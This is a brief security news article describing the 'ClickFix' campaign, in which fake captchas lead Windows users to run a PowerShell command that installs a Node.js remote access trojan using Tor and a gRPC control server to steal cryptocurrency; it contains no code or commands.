New Node.js Malware Spreads Through Tor Network to Steal Cryptocurrency

Post Views: 9

Cryptocurrency Scam ‘ClickFix’ Exposes Vulnerability in Human Interaction

A sophisticated scheme to pilfer cryptocurrencies from unsuspecting Windows users has been identified, with the malicious operation dubbed “ClickFix”. This operation exploits a vulnerability in the way people interact with websites.

Fake Captchas Trigger PowerShell Command

The scammers embed fake Captchas on websites, triggering a PowerShell command to download and install a Remote Access Trojan (RAT) onto the victim’s device. The RAT, powered by a Node.js runtime, masquerades as a legitimate application called “LogicOptimizer.”

According to researchers, “The RAT burrows deep into the Windows Registry, ensuring it launches automatically upon each reboot. It also utilizes the Tor network to conceal its online activity, further complicating its detection.”

Analysis and Tailoring of Actions

Upon execution, the RAT performs a thorough analysis of the compromised system, gathering information about the operating system version, CPU type, available RAM, and even the presence of anti-virus software. This analysis enables the malware to tailor its actions accordingly, avoiding detection by security programs such as Windows Defender, Kaspersky, Norton, and McAfee.

Malware-as-a-Service Venture

The ClickFix operation is not a solo effort but rather a Malware-as-a-Service (MaaS) venture, where affiliates rent a toolkit to conduct their own attacks. This approach allows the scammers to stay one step ahead of law enforcement agencies, whose efforts to disrupt the operation were ultimately unsuccessful due to an operational security (OPSEC) mistake by the attackers.

Communication and Control

Researchers discovered that the malware communicates with its Command and Control (C2) server through a protocol called gRPC, facilitating real-time monitoring and control of the infected devices. The C2 server also sends notifications to the affiliated scammers’ Telegram channels whenever a successful transaction occurs.

Expert Advice

Experts advise that users should exercise caution when encountering suspicious Captcha prompts, as they may indicate the presence of malicious software. Closing the browser tab immediately after detecting such anomalies can help prevent potential harm to one’s cryptocurrency wallet.

Authorities Remain Committed

Despite the sophistication of the ClickFix operation, authorities remain committed to dismantling the underlying infrastructure supporting this malicious activity. As the battle against cyber threats continues to evolve, users must remain vigilant and take proactive measures to safeguard their digital assets.